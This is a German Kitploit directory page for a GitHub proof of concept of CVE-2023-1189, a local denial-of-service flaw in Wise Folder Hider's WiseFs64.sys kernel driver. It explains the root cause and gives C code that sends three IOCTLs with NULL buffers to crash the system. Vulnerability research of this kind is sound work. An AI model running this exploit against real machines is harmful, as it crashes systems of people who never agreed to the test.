Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-1189 — CVE-2023-1189 PoC & Exploit | Kitploit
Tools/GitHubGitHub/le0s1mba/cve-2023-1189
SchwachstellenanalyseExploitationBinary-Exploitation
GitHuble0s1mba/cve-2023-1189

CVE-2023-1189

CVE-2023-1189 PoC & Exploit

Repository anzeigen
4vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-1189

1. Übersicht

Tool herunterladen
EintragDetail
CVE IDCVE-2023-1189
SchwachstellentypImproper Resource Shutdown or Release (CWE-404)
Betroffene SoftwareWiseCleaner Wise Folder Hider
Betroffene KomponenteWiseFs64.sys (Kernel Driver)
Betroffene Version4.4.3.202
CVSSNVD - 5.5(Medium), VulDB - 3.3(Low)
Veröffentlichungsdatum2023.03.06

Diese Schwachstelle ermöglicht es einem Angreifer mit Benutzerrechten, durch bestimmte IOCTLs eine NULL-Pointer-Dereferenzierung im Kernel auszulösen, was das System in einen BSOD-Zustand versetzt. Es handelt sich um eine lokale Denial-of-Service-Schwachstelle.

2. Grundursache

Die Schwachstelle CVE-2023-1189 tritt im Kernel-Treiber WiseFs64.sys auf, der vom Setup des Wise Folder Hider Programms Version 4.4.3.202 erstellt wird.

Der gesamte Ablauf der Schwachstelle ist wie folgt:

image.png

Betrachten wir den Ablauf genauer:

DriverEntry func

Zunächst wird in der DriverEntry-Funktion die Funktion dispatchDeviceControl an Index 14 der Dispatch-Tabelle gesetzt.

Dadurch werden alle IOCTLs, die an \\.\WiseFs eingehen, an dispatchDeviceControl weitergeleitet.

dispatchDeviceControl func

Wenn die dispatchDeviceControl-Funktion aufgerufen wird, wird zunächst überprüft, ob es sich um das Steuergerät handelt. Wenn ja, wird die Funktion handleControlDeviceIoctl aufgerufen.

handleControlDeviceIoctl func

Die Funktion handleControlDeviceIoctl enthält die Logik zur Verarbeitung der tatsächlichen IOCTL-Codes.

Bei mehreren IOCTL-Codes, insbesondere 0x222400, 0x222404 und 0x222410, fehlt die Überprüfung, ob der Wert des Puffers NULL ist oder nicht.

Wenn daher die oben genannten IOCTLs aufgerufen werden, während der Puffer NULL ist, greift der Treiber auf den Puffer zu, was zu einer NULL-Pointer-Dereferenzierung und einem BSOD führt.

3. PoC & Exploit

root@kitploit:~
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>

#define SymLinkName L"\\\\.\\WiseFS"

HANDLE hDevice;

int main(int argc, char* argv[]) {
	DWORD dwWrite = 0;

	hDevice = CreateFileW(SymLinkName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if (hDevice == INVALID_HANDLE_VALUE) {
		printf("failed to CreateFile\n");
		return 1;
	}

	// case 0x222400
	// DeviceIoControl(hDevice, 0x222400, NULL, 0, NULL, 0, &dwWrite, NULL);

	// case 0x222404
	// DeviceIoControl(hDevice, 0x222404, NULL, 0, NULL, 0, &dwWrite, NULL);

	// case 0x222410
	// DeviceIoControl(hDevice, 0x222410, NULL, 0, NULL, 0, &dwWrite, NULL);
	
    CloseHandle(hDevice);
    return 0;
}

4. Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2023-1189
  • https://www.cve.org/CVERecord?id=CVE-2023-1189
  • https://cwe.mitre.org/data/definitions/404.html
  • https://github.com/zeze-zeze/WindowsKernelVuln/tree/master/CVE-2023-1189